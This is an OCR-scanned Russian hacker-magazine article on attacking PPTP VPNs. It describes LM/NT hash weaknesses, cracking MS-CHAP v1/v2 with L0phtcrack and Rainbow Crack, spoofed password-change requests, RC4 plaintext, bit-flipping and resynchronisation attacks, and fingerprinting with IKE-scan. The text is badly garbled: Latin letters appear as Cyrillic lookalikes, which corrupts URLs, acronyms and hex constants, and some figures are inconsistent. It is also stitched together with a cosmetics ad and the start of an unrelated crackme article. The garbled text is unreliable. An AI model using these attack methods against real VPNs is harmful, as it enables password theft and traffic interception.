ИЛИ БЕСПРОВОДНЫЕ СЕТИ, НЕПОДВЛАСТНЫЕ ХАКЕР- 
СКИМ АТАКАМ. ЧИТАЯ МНОГОЧИСЛЕННЫЕ СТАТЬИ О 
ѴРІЧ, У ТЕБЯ МОГЛО СЛОЖИТЬСЯ МНЕНИЕ, ЧТО ЭТА 



ТЕХНОЛОГИЯ — НАСТОЯЩАЯ ПАНАЦЕЯ ОТ ВСЕХ ПРО- 
БЛЕМ, СВЯЗАННЫХ С ПЕРЕДАЧЕЙ СЕКРЕТНЫХ ДАН- 
НЫХ ПО НЕЗАЩИЩЕННЫМ СЕТЯМ. ОДНАКО НА ПРАК- 
ТИКЕ ОКАЗЫВАЕТСЯ, ЧТО ИСПОЛЬЗОВАНИЕ ѴРЫ И 
ПОЛНАЯ УВЕРЕННОСТЬ В ЗАЩИЩЕННОСТИ ДАННЫХ 
МОЖЕТ СЫГРАТЬ ЗЛУЮ ШУТКУ I крис касперски ака мыщъх 



Работа, недочеты и ошибки 
в реализациях ѴРЫ 

[как это было] Лет тридцать назад, когда Интернет только-только за- 
рождался, обмен конфиденциальными данными осуществлялся через 
выделенные каналы и Х.25 сети, построенные на основе обычных теле- 
фонных сетей. Также использовалось прямое модемное соединение, 
радиорелейная связь и прочие телекоммуникационные средства. Высо- 
кая степень защищенности «компенсировалась» столь же высокой це- 
ной и смехотворной скоростью передачи данных. 

[прогресс криптографии] С развитием криптографии все измени- 
лось. Появилась возможность передавать зашифрованные данные че- 
рез открытые сети, заведомо подверженные перехвату. Для этого в них 
пробиваются так называемые виртуальные туннели (ѵИиаІ ШппеІ или 
рідду-Ьаск). Сам механизм передачи не изменился. К нему всего лишь 
добавилось шифрование. Но разве шифрование не использовалось ра- 
ньше? В чем же революционность предложенной технологии? А в том, 
что традиционная симметричная криптография требует предваритель- 
ной передачи секретного ключа, которым получатель будет расшифро- 
вывать текст. Следовательно, необходим защищенный канал передачи. 
А такого канала чаще всего нет. Если же он есть, то можно не замора- 
чиваться с шифрованием, а передать текст напрямую. Имеются и дру- 
гие проблемы. Ключи нужно как можно чаще менять, причем необходи- 
мо защищаться не только от вскрытия шифра, но и от навязывания лож- 
ных паролей. Короче, сплошной геморрой. 

Виртуальные сети этих проблем лишены. Они действительно преобра- 
зили мир, освободив транснациональные корпорации от необходимости 
развития собственной инфраструктуры змеящихся кабелей. И хотя Міс- 




На нашем диске ты най- 
дешь упомянутые в статье 
программы, документы и 
книги. 



ш 



гозоК отчаянно проталкивала их в 
малый бизнес, шестеренки вра- 
щались со скрипом, и дальше ре- 
кламной шумихи дело не шло. Для 
удаленной работы с офисом за- 
щищенности обыкновенных ин- 
тернет-каналов вполне достаточ- 
но, а уж про «домашние» локаль- 
ные сети речь и вовсе не идет. 

А вот в беспроводных сетях, тех- 
нология ѴРЫ оказалась как нельзя 
кстати. Радиоволны не знают гра- 
ниц и перехватываются на значи- 
тельных расстояниях. Легкость 
взлома многократно усиливает 
требования к защищенности. Лю- 
бой паренек, вооруженный снифе- 
ром, может посмотреть пароль на 
ящик и изменить его, не говоря 
уже про чтение личной переписки. 

Г рязными лапами в чужую душу! А 

ѴРІЧ на что? Поставим его и будем чувствовать себя как за каменной 
стеной! Или она только с виду каменная, а в действительности это про- 
сто картон? Давай разбираться. 




Занимательный факт: в 
ІКЕ-Зсап'е недавно обнару- 
жили уязвимость. Забавно: 
инструмент для поиска 
дыр сам оказался большой 
дырой. 

Следует понимать, что 
прослушивание чужих за- 
щищенных каналов — это 
уголовно наказуемое дело. 
И хоть у тебя кишка тонка 
на практике поломать чу- 
жой ѴРІ\І-канал, мы тебя 
предупредили :). 



[архитектура ѴРЫ] ѴРІЧ представляет собой внушительное сооруже- 
ние, использующее десятки разнообразных протоколов, гоняющих паке- 
ты данных, словно кровь по артериям. Полный анализ архитектуры ѴРІЧ 
не входит в нашу задачу (тем более, что она постоянно развивается и со- 






поле номера протокола в заголовке ІР-пакета 



вершенствуется). Взломщику, грабящему банк, совершенно необяза- 
тельно знать расположение унитазов и держать в голове все изгибы ка- 
нализационных труб. Хотя эта информация будет очень полезной при 
планировании путей отступления, большинство ограниваются изучением 
основных маршрутов: двери — касса — сейф. Так же поступим и мы. 



[внутри РРТР] Протокол РРТР (Роіпі Іо Роіпі Типпеііпд Ргоіосоі — Тун- 
нельный Протокол Точка — Точка) — это основной протокол для орга- 
низации ѴРЫ-сетей под ѴѴіпсІоѵѵз. Он связывает две системы виртуаль- 
ным каналом связи. На одной стороне сидит клиент (сііепі), на другой — 
сервер (зегѵег), в результате чего обе части получаются сильно нерав- 
нозначными. А что находится внутри тоннеля? Для поддержания своей 
работоспособности, сервер открывает 1723 ТСР-порт, на котором висит 
система жизнеобеспечения, она же Сопігоі Соппесііоп — служебный ка- 
нал связи, связывающий сервер с клиентом (изначально использовался 
5678 порт, но ІАЫА — Іпіегпеі АззідпесІ ЫитЬегз Аиііюгііу — организация, 
ведающая регистрацией доменов и портов, решила иначе и утвердила 
за РРТР-сервером 1732 порт, список остальных зарегистрированных 
портов можно найти на ѵѵѵѵѵѵ. іапа . огд/аззідптепІз/рогі-питЬегз) . Клиент- 
ский порт может быть любым, и выбирается им (а точнее его осью) са- 
мостоятельно. Никакой аутентификации здесь не требуется, что откры- 
вает простор для всевозможных махинаций, например, хакер может 
принудительно закрыть чужую сессию. 

Служебный канал в основном используется для управления скоростью 
поступления трафика, избегая холостых простоев и предотвращая «за- 
торы». Это осуществляется путем рассылки специальных РРТР-сообще- 

ний (РРТР Сопігоі Соппесііоп тез- 
заде). Каждое такое сообщение 
начинается с заголовка, а закан- 
чивается «производственной» ин- 
формацией. Длина заголовка фик- 
сирована и составляет 8 октетов. 
Тело сообщения включает в себя: 
поле длины (Тоіаі теззаде ІепдІГі), 
тип сообщения: служебное или 
управляющее сообщение (Сопігоі 
Меззаде/МападетеШ Меззаде) и 
магическую последовательность 
4ЭИ ЗС 2С 1 АГі, по которой его 
можно легко идентифицировать в 
общем потоке трафика и которую 
использует программа бесеіТс 




схематичная реализация ѴРЫ по- 
верх ЕІНегпе* 



{Ыір://раскеізіогтзесипіу.пІ/пеѵѵ-ехрІоНз/бесеіі.с) для грабежа хэширо- 
ванных паролей. Однако не будем забегать вперед, давай пока вернем- 
ся к МісгозоК и ее баранам. 

Сам тоннель не использует ТСР и работает исключительно на ІР- 
уровне с использованием протокола инкапсуляции ЭРЕ (Оепегіс Еп- 
сарзиіаііоп Ргоіосоі — Общий Протокол Инкапсуляции). Это вполне 
самостоятельный протокол, никак не зависящий от РРТР, предста- 
вленный двумя документами РРС 1701 ВЕС 1702 (однако МісгозоК ис- 
пользует собственные расширения, известные под именем ОВЕ м2). 
Передаваемые данные разбиваются на пакеты и передаются по ІР по 
протоколу 47, закрепленном за ОВЕ. «Протокол» в данном случае — 
это поле ргоіосоі ІР-пакета. Не путать его с портом! В ІР нет никаких 
портов. Они реализованы в протоколах верхнего уровня — ТСР и 
ІЮР, а ОВЕ — это просто еще один протокол. 

Внешне ОВЕ очень похож на ТСР, в нем есть понятия скользящих окон 
(зіісііпд ѵѵіпбоѵѵ), сегментов (зедтепіз), номеров последовательности 
(зециепсе питЬег) и номеров подтверждения (аскпоѵѵіесідетепі питЬег). 
В практическом плане это означает, что непосредственный спуфинг РРР- 
пакетов невозможен. Если мы попытаемся навязать серверу (или клиен- 
ту) подложный пакет, то произойдет рассинхронизация сессии и соедине- 
ние окажется нарушено. В локальных сетях проблема решается посылкой 
2 Л 32 пакетов. Поскольку, поле зециепсе питЬег занимает 32-бита, проис- 
ходит его переполнение и значение счетчика восстанавливается. Но для 
атаки через Интернет это потребует немыслимого количества времени. 
Ситуация кажется безнадежной, но кое-какая лазейка все-таки есть. 

В заголовке ОВЕ-пакетов присутствует специальный флаг Зециепсе 
ЫигпЬег Ргезепі (бит 3), условно обозначаемый латинской буковой 3. 
Если он равен нулю, то номер последовательности признается недей- 
ствительным, и принимающая сторона должна его игнорировать. Во 
всяком случае, так говорит Стандарт. Естественно, конкретные реали- 
зации могут существенно отличаться. Тем не менее потенциальная ды- 
ра все-таки есть. Кстати говоря, Стандарт не дает никаких указаний, как 
обрабатывать дубликаты (пакеты с одинаковым номером последова- 
тельности), оставляя это на совести конкретных реализаций. Принимаю- 
щая сторона может либо отбросить один из пакетов, либо затребовать 
его повторную передачу. В обоих случаях рассинхронизации не проис- 
ходит, то есть получается как бы самосинхронизующийся протокол. 
Поверх ОВЕ реализованы протоколы аутентификации и шифрования (а 
при необходимости еще и сжатия, за которое чаще всего отвечает 
МРРЕ). МісгозоК поставляет довольно большой ассортимент различных 
проколов (см. соответствующую врезку), так что клиенту с сервером 
есть из чего выбирать! При желании шифрование можно и вовсе отклю- 
чить, а аутентификацию осуществлять «прямым» текстом, но это будет 
слишком недальновидное решение, полностью обесценивающее идео- 
логию ѴРЫ и открывающую двери для всех желающих. Нормальные ад- 
министраторы так не поступают, предпочитая использовать более за- 
щищенные МЗ-СНАР и І_АІ\ІМАІМ НазЬ. 

На самом деле, их защищенность сильно преувеличена и они уже 
давно взломаны. Подробнее об этом можно прочитать в моей «Тех- 
нике сетевых атак», электронную копию которого можно бесплатно 
скачать с Ир — пегиті.огд.ги (пегиті по-японски мыщъх). К тому же, 
шифруются только пакеты с данными (ЭАТА раскеіз). Служебные 
протоколы, составляющие весьма значительную часть РРР-трафи- 
ка, такие, например, как ЮР — Ыпк Сопігоі Ргоіосоі (Протокол 
Управления Каналом) — остаются незашифрованными со всеми 
вытекающими отсюда последствиями. 



ЧТО ЧИТАТЬ? 

- Маіѵѵаге РАО МісгозоК РРТР ѴРЫ — подробный и доход- 
чивый 1ас\ по взлому ѴРЫ (на английском языке): 

ѵѵѵѵѵѵ. запз . огд/гезоигсез/таіѵѵагеіа д/ррір-ѵрп.ріір 

- Вгеакіпд іИе Зесиге За^е — фрагмент из книги ѴѴігеІезз 
Наскіпд: Вгеакіпд ТИгоидП, посвященной взлому беспро- 
водных сетей с кучей практических примеров (на англий- 
ском языке): ѵѵѵѵѵѵ. іпіогтіі.сот/агіісіез/агііс- 
Іе.азр?р=353735&зедШт=8&гІ=1 

- [ТІіе СгитЫіпд ТиппеІ]-<А Мепадегіе о* РРТР ѴиІпегаЬіІіР 
іез> — статья из ріпгаск'а с обстоятельным анализом уяз- 
вимостей РРТР-протокола (на английском языке): 

ѵѵѵѵѵѵ .рЫаск.ог д/рЫаск/ 53/Р 53- ^2 

- Криптоанализ туннельного протокола типа точка-точка 
(РРТР) от МісгозоК — перевод статьи известного криптоа- 
налитика Брюса Шрайера и этим все сказано (на русском 
языке) : ѵѵѵѵѵѵ. ззІ.зіи.пеѵа.ги/рзѵѵ/сгуріо/ррір.ЫтІ 
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Ц] образуются две 8-байтовые строки 

[ё] эти строки «склеиваются» друг с другом, образуя 16-байтовый хэш 





І_С5 за работой 



[аутентификация 
снаружи и изнутри] 

Аутентификация осу- 
ществляется либо от- 
крытым тестом (сіеаг 
Іехі раззѵѵогсі), либо по 
схеме запрос/отклик 
(СНаІІепде/Везропзе). 
С прямым текстом все 
ясно. Клиент посылает 
серверу пароль. Сер- 
вер сравнивает это с 
эталоном и говорит 
«пошел на ху т.» или «добро пожаловать». Хакер, вооруженный снифе- 
ром, может легко перехватить открытый пароль, и защита пойдет лесом. 
Нам этот случай не интересен, поэтому не будем на нем останавливать- 
ся. К тому же открытая аутентификация в живой природе практически не 
встречается. Схема запрос/отклик намного более продвинута. В общем 
виде она выглядит так: 

Щ клиент посылает серверу запрос (гециезі) на аутентификацию 
Ш сервер возвращает случайный отклик (сИаІІепде) 

[з] клиент снимает со своего пароля хэш, шифрует им отклик и переда- 
ет его серверу 

Щ то же самое проделывает и сервер, сравнивая полученный результат 
с ответом клиента 

® если зашифрованный отклик совпадает, аутентификация считается 
успешной 

Таким образом, для аутентификации знать оригинальный пароль вооб- 
ще не нужно, достаточно угадать/перебрать/подсмотреть его хэш, одна- 
ко хэш не передается в открытом виде по сети, и эта схема позициони- 
руется как устойчивая к перехвату, что очень хорошо. А вот ее недостат- 
ки: исходный хэш должен как-то попасть на сервер, поэтому для пере- 
дачи пароля необходим защищенный канал. Это раз. Процедура аутен- 
тификации уязвима для Ьгиіе-Іогсе атаки. Перехватив исходный и заши- 
фрованный сііаііепде, мы можем попытаться подобрать ключ шифрова- 
ния, перебирая столько вариантов, сколько хотим. Ни сервер, ни клиент 
в этой затее никак не участвуют и не могут нам помешать. Это два. 
Стойкость системы определяется по формуле тіп(зІгІеп(ра55ѵѵсІ),5І2- 
еоДПазН)). Если хэш короток, то длина пароля не играет никакой роли, и 
взлом может завершиться за очень короткое время. Это три. Но это все 
голая теория. Посмотрим, как обстоят дела на практике. 

МісгозоК ѴѴіпсІоѵѵз поддерживает два типа хэшей: «родной» ЫТ-хэш и 
хэш І_АЫ Мападег, доставшейся ей в наследство от 03/2 (давным-давно 
эти системы шли вместе) и благополучно доживший до на- 
ших дней, несмотря на свою катастрофическую незащи- 
щенность. Как он рассчитывается? А вот так! 



ІДПі клиентский пароль преобразуется в 14-байтовую А5СІІ- 
строку (более длинные пароли усекаются, а более короткие 
дополняются нулями) 

\2\ все символы приводятся к верхнему регистру 

[з] 14-символьный пароль разбивается на две 7-символь- 

ные «половинки» 

Щ каждой 7-символьной «половинкой» зашифровывается 
постоянная константа ААЭЗВ435В5140ЕЕІ1 по алгоритму ЭЕЗ 



Независимое хеширование половинок пароля, в 1 000 000 000 000 000 
раз уменьшает количество попыток, требующихся для его перебора (а 
вовсе не в два раза, как это может показаться на первый взгляд). Это 
же какой талант надо иметь, чтобы допустить такой ляп! Уж сколько раз 
твердили миру (то есть разработчикам) — не разводите самодеятель- 
ность, используйте проверенные временем алгоритмы, да только все не 
впрок. Ситуация усугубляется тем, что алгоритм ЭЕЗ не требует гро- 
моздких вычислений и потому на современных процессорах І_М-хэш мо- 
жет быть взломан за короткое время. Какое — не имеет значения. Ведь 
в открытом виде он все равно не передается. Правда, подобранный па- 
роль может пригодится при входе в систему с клавиатуры. 

А вот так вычисляется ЫТ-хэш: 

Щ в зависимости от настроек системы клиентский пароль преобразует- 
ся либо к 14-символьной (по умолчанию), либо к 128-символьной АЗСІІ 
строке, причем большинство администраторов используют длину по 
умолчанию, не утруждаясь ее поменять 
\2\ АЗСІІ-строка преобразуется в ІІЫІСОЭЕ 
[з] вычисляется 16-байтовый кэш по алгоритму ІѴЮ4 

Как видно, ЫТ-хэш намного более стоек, поэтому в случае с ЫТ-хэшем 
хакеры предпочитают перебирать сам хэш, а с І_М-хэшем — исходный 
пароль. 

Теперь рассмотрим, как работает процедура аутентификации. Обычно 
она осуществляется либо по протоколу МЗ-СНАР ѵі , либо по МЗ-СНАР 
ѵ2. Начнем с первого из них, он работает так: 

ЕЕ клиент посылает запрос на аутентификацию ѴРЫ-серверу, открыто 
передавая свой Іодіп 

\ 2 \ сервер возвращает 8-байтовый случайный отклик 

[з] клиент снимает со своего пароля І_М-хэш и генерирует три ЭЕЗ-клю- 

ча 

И каждый из этих ключей зашифровывает отклик и получается три 8- 
байтовых строки 

[|] три 8-байтовых строки объединяются в одну 24-байтовую, которая пе- 
редается серверу 

[ё] сервер, извлекает из своей базы хэш данного клиента и расшифро- 
вывает строку 

|Ц если результат расшифровки совпадает с исходным откликом, то все 
ок, и наоборот 

А вот так работает МЗ-СНАР ѵ2: 

01 клиент посылает запрос на аутентификацию ѴРЫ- серверу, открыто 
передавая свой Іодіп 

\2\ сервер возвращает клиенту 16-байтовый случайный отклик 

[з] клиент генерирует 16-байтовый РАС (Реег АиІНепйсаІог СИаІІепде — 

Равный Отклик Аутентификации) 

Щ клиент объединяет РАС, отклик сервера и свой изегпате в одну стро- 
ку 

[б] с полученной строки снимается 8-байтовый хэш по алгоритму ЗНА-1 
и посылается серверу 

[б] сервер извлекает из своей базы хэш данного клиента и расшифро- 
вывает его ответ 

0 если результат расшифровки совпадет с исходным откликом, все ок, 
и наоборот 

[в] впоследствии сервер берет РАС-клиента и на основе хэша генериру- 
ет 20-байтовый АВ (АиІПепІісаІог Везропзе — Аутентификационный От- 
вет), передавая его клиенту 

[э] клиент проделывает ту же самую операцию и сравнивает полученный 
АВ с ответом сервера 

[ю] если все совпадает клиент аутентифицирует сервер 



протокол 


метод шифрования 


старый МРРЕ 


ВЗА ВС4, 40-, 56-разрядные ключи 


новый МРРЕ 


ВЗА ВС4, 128-разрядные ключи 


ІРЗес 


ОЕЗ, 56-разрядные ключи 


ІРЗес Тгіріе 


ЗОЕЗ 



основные механизмы хэширования и аутентификации, используемые в ѴРЫ 









Как видно, протокол М5-СНАР ѵ2 выглядит более защищенным, чем 
М5-СНАР ѵі, однако оба они уязвимы. Подробности можно найти в 
статье Брюса Шнайера Сгуріапаіузіз оі МісгозоК'з М3 СНАР ѵ2 
( \А/\А/]А/.зсІіпеіег.сот/рарег-рр1рѵ2.МтІ ), которая, вопреки своему назва- 
нию, описывает не только МЗ-СНАР ѵ2, но и МЗ-СНАР ѵі. 

Чем плох МЗ-СНАР ѵі? Тем, что его уже давно научились ломать. В 
Сети можно найти множество готовых «отмычек», работающих в пол- 
ностью автоматизированном режиме и не требующих никакой квали- 
фикации. Скачал — запустил — поимел. Самая известная (и самая 
древняя!) — это 1_0рП1сгаск, но сейчас проект сдулся и переименовал- 
ся в І_С 5 ( шшш.зесигіІуіосиз.сот/іооІз/1005 ), а на прежнем адресе 
ѵѵѵѵѵѵ.ІОрЫсгаск.сот висит объявление о продаже. Тем не менее, 
1_0рП1сгаск по-прежнему остаются в строю, поскольку в отличие от 
жаждущего денег І_С 5, он распространяется бесплатно. Найти его 
можно на любом хакерском сайте. 

На Репііит 4 с такой частотой, как 3 ОН 7., полный цикл перебора за- 
нимает не более 4 часов, а в среднем пароль подбирается за 2 часа. 
Вот тебе бабушка и безопасность! И это еще не предел! По сути, 
1_0рП1сгаск представлял собой тривиальный переборщик, работающий 
по принципу грубой силы (скажут копать — буду копать). Это неэле- 
гантно и непроизводительно. 

В начале 2004 года 20-летний швейцарский хакер Филипп Ошлин (РЫ- 
Іірре ОесИзІіп), ведущий научный ассистент лаборатории криптографии 
и защиты Швейцарского государственного технологического института 
в Лозанне, сообщил о принципиально новом методе ускоренного взло- 
ма (Разіег Тіте-Метогу ТгасІе-СШ ТесИпіцие), основанном на предвычи- 
сленных таблицах, содержащих все возможные комбинации символов в 
пароле. Отталкиваясь от работ Мартина Неллмана (Магііп НеІІтап), 
Филлипп переработал и усилил алгоритм подбора паролей, «адаптиро- 
вав» его к алгоритму І_М-менеджера. Время взлома сократилось в ~12 
раз, и на АМЭ 2500+ с 1 ,5 Гб ОЗУ составило всего 13,6 секунд! Ну пря- 
мо взлом в реальном времени! А ведь это не самый мощный компьютер 
из всех доступных. Следует отметить, что объем памяти важен потому, 
что предвычисленные таблицы очень велики, а интенсивный своппинг 
на диск съедает всю производительность. 

Все подробности можно найти в статье Филиппа, выложенной на Швейцар- 
ском сайте {Іазесѵѵуѵуѵ. еріі. сІі/рІір_сосІе/риЫісаііопз/зеагсІі.р^Р ?геі=ОесіпОЗ) 
и уже реализованных в программе ВаіпЬоѵѵ Сгаск ( шш.апізідІпі.сот/гзІ/га - 
іпЬошгаск), демонстрационная версия которой распространяется бесплат- 
но, а вот за полную версию предвычисленных таблиц придется выложить 
500$. Вообще-то, их можно найти в Сети и бесплатно, но здесь есть одно 
«но». Для работы с ними потребуется установить 60 Гбайт оперативной па- 
мяти. Такой объем домашние компьютеры уже не поддерживают. Это уже 
нехилая серверная конфигурация, на фоне которой жалкие 500$ погоды не 
делают. Зато и пароль взламывается мгновенно! Причем, не только І_М, но 
ІЧТ. Так что криптография не стоит на месте! И надежность парольных за- 
щит с каждым годом вызывает все большие и большие сомнения. 



ИССЛЕДОВАНИЕ ѴРІЧ-СЕТЕЙ 

Большинство компаний предпочитают не афишировать на- 
личие ѴРЫ-сервера в своей сети. И это правильно, по- 
скольку практически ни одна реализация не смогла избе- 
жать программистских ошибок, и за последние несколько 
лет было обнаружено множество дыр, но использовать их 
не так-то просто! Во-первых, необходимо выяснить ІР-ад- 
рес ѴРІЧ-севера, а во-вторых, как-то определить тип про- 
граммного обеспечения и версию реализации. 

Вот для этого и нужен ІКЕ-зсап! Это бесплатно распростра- 
няемая утилита, посылающая СопІгоІ Соппесііоп запросы 
по ІЮР и анализирующая ответы. Как показала практика, 
каждая реализация имеет свой уникальный «почерк», на 
жаргоне называемый «отпечатком» (Тіпдегргіпі:), по которо- 
му ее можно определить. Методика снятия отпечатков по- 
стоянно совершенствуется, и за подробной информацией 
лучше обратиться непосредственно к самим разработчикам 
(\л/\л/\А/ліа-топііог.сот/іке-5сап/оѵегѵіе\А/-оІсІ.Мт). Оттуда же 
можно скачать и готовую утилиту с исходными текстами в 
придачу: уѵуѵуѵ. піа -топ Но г. сот/іке -зсап/бо ѵѵпіоа сІ.Мт. Как и 
большинство остальных программ этого рода, она ориенти- 
рована на ІІІМІХ, но неплохо чувствует себя и под ѴѴіпсІоѵѵз в 
среде Судѵѵіп. Некоторые дистрибутивы (например, ЭЕВІ- 
АІЧ) уже включают ее в штатный комплект поставки, поэто- 
му ничего качать не надо. 




На первом свидании начни 
с демонстрации чистой кожи 

ОТ 



;п 



РОК МЕЫ , а не с 

демонстрации своих успехов 
в области построения таблиц 
для І_АІ_Р (Л ) - компилятора 
- это понятно не всем 
девушкам. 





Представлен в серии в 
двух вариантах: 
для нормальной и для 
чувствительной кожи. 






шампунь очищает волосы, делает их 
мягкими и блестящими, 
гель для умывания эффективно 
очищает кожу лица от загрязнений, 
гель для душа освежает и эффектив- 
но очищает кожу тела, придавая ей 
приятный легкий аромат 
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заголовок ОВЕ-пакета с 3-флагом 



Но это не единственное слабое ме- 
сто МЗ-СНАР ѵі. Есть и другие. 
Например, атакующий может при- 
кинуться сервером и послать кли- 
енту запрос на смену пароля, кото- 
рый не требует аутентификации и 
будет воспринят как правильный. 
Как уже было показано выше, воз- 
можность аутентификации серве- 
ра клиентом появилась только в 
МЗ-СНАР ѵ2. Клиент вводит свой 
старый и новый пароль, атакую- 
щий благополучно их «съедает» и, 
используя «старый» пароль, тут же подключается к серверу. Коммента- 
рии, как говорится, излишни. Ведь если «блокировка пароля» отключе- 
на и установлено бессрочное время его использования, запрос на сме- 
ну пароля будет звучать весьма странно, если не сказать подозритель- 
но, а если пароли меняются каждые несколько дней, то к этому привы- 
кают и перестают обращать внимание. 

Протокол МЗ-СНАР ѵ2 намного более защищен, и фокус с «подделкой» 
сервера в нем уже не проходит, однако он остается уязвим для ути- 
лит, типа ВаіпЬоѵѵ Сгаск, которые взламывают его за очень короткое 
время, правда, при условии, что у хакера имеется достаточное количе- 
ство оперативной памяти или несколько лишних часов :). 

[шифрование снаружи и изнутри] Все, о чем мы до сих пор говори- 
ли, касалось аутентификации. Теперь давай разберемся с шифрованием. 
В настоящее время поддерживаются два метода шифрования: МРРЕ 
(МісгозоК РоіпМо-РоіпІ Епсгурііоп — Протокол Шифрования от МісгозоК) 
и ірзес. Первый протокол декларируется в ВЕС 3078, а ІРЗес описыва- 
ется целым тандемом ВЕС: ВЕС 1825 — ІР Зесигііу АгсПіІесІиге (Архитек- 
тура Безопасности ІР), ВЕС 1826 — ІР Аиіепіісаііоп Неабег (Заголовок 
Аутентификации ІР), ВЕС 1827 ІР Епсарзиіаііпд Зесигііу Рауіоаб, ЕЗР — 
Инкапсулированная Секретная Начинка в ІР, ВЕС 1828 — ІР Аиіепііса- 
Ііоп изіпд КеуесІ М05 (Метод Аутентификации по ключам М05), ВЕС 
1829 — ЕЗР ОЕЗ-СИрИег ВІоск СИаіпіпд Тгапзіогт (Преобразование Сце- 
пленных Блоков Инкапсулированной Начинки Зашифрованной по БЕЗ). 
Помимо этого, существуют и другие ІРЗес ВЕС, которые легко найти на 
мт\ /ѵ.гіс-есіііог.огд. Это целый талмуд, с которым толпа гиканутых парней 
не успеет разобраться и за год! 

Оба протокола реализованы как в МісгозоК ѴѴіпсІоѵѵз, так и вне ее (на- 
пример, в *В30), но алгоритмы работы ѴРІЧ могут существенно отлича- 



ться. Основные сведения приведены в таблице 2. 

Выбор метода шифрования определяется типом и конфигурацией 
ѴРЫ-сервера. При подключении по РРТР применяется шифрование 
МРРЕ, а при подключении по І_2ТР (І_ауег 2 Типпеііпд Ргоіосоі) — ши- 
фрование ІРЗес. Протокол І_2ТР был разработан рабочей группой ІЕТЕ 
РРР Ехіепзіопз с целью объединения функциональности Сізсо І_2Е, 
плюс РРТР стандартизирован в 1999 году документом ВЕС под номе- 
ром 2661 . Сейчас происходит его активное внедрение. Внешне І_2ТР 
очень похож на РРТР, но если РРТР работает только в ІР-сетях, то 
І_2ТР поддерживает Егате Веіау, Х.25 и АТМ. 

Если майкрософтовский ѴРІ\І-клиент настроен на автоматический вы- 
бор типа сервера (как и происходит по умолчанию), сначала предприни- 
мается попытка использовать протокол І_2ТР с алгоритмом шифрова- 
ния ІРЗес, и только если эта попытка не увенчалась успехом, происхо- 
дит переход на РРТР с шифрованием по МРРЕ. 

Рассмотрим РРТР как наиболее простой и распространенный про- 
токол шифрования. С точки зрения хакеров, он привлекателен тем, 
что использует простой потоковый шифр ВС4, уязвимости которо- 
го хорошо известны. За последние несколько лет криптоаналитики 
разработали множество эффективных атак, а вычислительные 
мощности возросли настолько, что даже лобовой подбор 40-битно- 
го ключа представляет из себя плевое дело. Перечислим три ос- 
новные уязвимости ЕЮ4: 

Ш Атака по открытому тексту. На основе ключа шифрования генери- 
руется псеводослучайная последовательность (она же гамма), кото- 
рой накладывается на шифруемый текст через ХОЕІ. Что может быть 
проще! Если атакующий знает содержимое и позицию шифруемого 
байта, то путем повторного применения ХОЕІ он может восстановить 
один байт гаммы. Поскольку, шифруемые пакеты содержат предска- 
зуемую информацию (например, заголовки), а одни и те же участки 
гаммы многократно накладываются на различные участки шифруе- 
мого текста, хакер может восстановить всю гамму целиком путем 
тривиального сбора трафика! 

\2\ Атака «переворотом битов» (ЬіМІірріпд аКаск). После начальной ау- 
тентификации и установки соединения, остальные пакеты не аутенти- 
фицируются, поэтому, атакующий может свободно менять содержи- 
мое зашифрованных битов. Конкретная реализация атаки может вы- 
глядеть, например, так. Хакер перехватывает зашифрованный пакет 
снифером, изменяет несколько битов пакета и пересчитывает его 
СЕІС, после чего передает пакет серверу, который благополучно «про- 
глатывает» поддельный пакет (ведь СЕЮ рассчитан правильно) и пе- 
редает его на следующий уровень в стеке протоколов. На уровне 3 (Іа- 
уег 3) происходит конкретный облом. Пакет отвергается и генерирует- 
ся вполне предсказуемый ответ, который передается «наверх», под- 
вергаясь шифровке. Хакер вылавливает зашифрованный пакет и при- 
меняет атаку по прямому тексту, восстанавливая гамму ключа. Все! 
Теперь остальные пакеты расшифровываются «на ура»! 

[з] Атака путем ресинхронизации: если в процессе передачи теряется 
пакет, либо приходит пакет с неверным номером в заголовке МРРЕ, 
происходит так называемая «ресинхронизация ключа». Отправитель ре- 
инициализирует таблицы ЕЮ4 и устанавливает бит «сброшен» (ІІизІіесІ) 
в заголовке МРРЕ. Если система обнаруживает в пакете установленный 
бит «сброшен», она реинициализирует свои таблицы ЕЮ4 и 
устанавливает счетчик пакетов в соответствии с получен- 
ным значением. В практическом плане это означает, что 
шифрование гаммой начинается сначала. Если хакер будет 
бомбардировать жертву запросами на ресинхронизацию (а 
они не требуют никакой аутентификации), то все пакеты бу- 
дут шифроваться одной и той же гаммой, что существенно 
упрощает атаку по открытому тексту. 

Все три описываемые атаки относятся к МЗ-СНАР ѵі, а в 
МЗ-СНАР ѵ2 их влияние значительно ослабло, поэтому ос- 
новным способом взлома стал подбор пароля с помощью 
таких программ, как ЕІаіпЬоѵѵ Сгаск. 





[заключение] Так все-таки, можно доверять ѴРЫ-се- 
тям, или нет? Ответ неоднозначен. Да, они действи- 
тельно представляют собой дополнительный уровень 
защиты поверх традиционных сетей, однако открывать 
доступ во внутреннюю корпоративную сеть через ѴРЫ 
очень опасно. Хакер без труда сможет подобрать па- 
роль за столь короткое время, что администратор и 
глазом моргнуть не успеет. Последствия такого втор- 
жения каждый может домыслить сам. Тут не нужно бо- 
гатого воображения е 
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В СЕНТЯБРЕ В КАЧЕСТВЕ ОЧЕРЕДНОГО Х-КОНКУРСА 
МЫ ПРЕДЛОЖИЛИ ТЕБЕ ИССЛЕДОВАТЬ НА ПРЕДМЕТ 
ВОЗМОЖНОГО ВЗЛОМА ПРОГРАММНУЮ ЗАЩИТУ 
СПЕЦИАЛЬНО ПРИГОТОВЛЕННОГО СВАСКМЕ. 



УЧИТЫВАЯ, ЧТО С ЗАДАНИЕМ СПРАВИЛОСЬ 7 
ЧЕЛОВЕК, НЕЛИШНИМ БУДЕТ РАССКАЗАТЬ О ТОМ, КАК 
НАДО БЫЛО ПРОХОДИТЬ КОНКУРС, КАКИМ ОБРАЗОМ 
МОЖНО БЫЛО ВЗЛОМАТЬ НАШУ ПРОГРАММУ. 



[инструменты для взлома] Начнем с инстру- 
ментария, который тебе понадобится для иссле- 
дований. Что бы ни говорили знатоки крэкинга, 
но для взлома данного крэкми тебе понадобится 
только ОІІу ЭеЬиддег (далее — Олька). Конечно, 
можно запрячь всякие файловые анализаторы и 
распаковщики, но без всего этого вполне можно 
обойтись. Чтобы узнать, с чем мы имеем дело, 
может пригодиться файловый анализатор РЕЮ. 
Он не покажет нам никаких данных относительно 
языка, на котором написана программа, отсюда 
можно сделать логичный вывод о том, что прог- 
рамма упакована, а поскольку РЕЮ не выводит 
имя упаковщика, то он либо новый, либо малоиз- 
вестный. Скажу по секрету, паковал я этот крэк- 
ми ІІРаск'ом версии 0.32. Этот пакер бесплатный 
и обеспечивает лучшее, по сравнению с другими, 
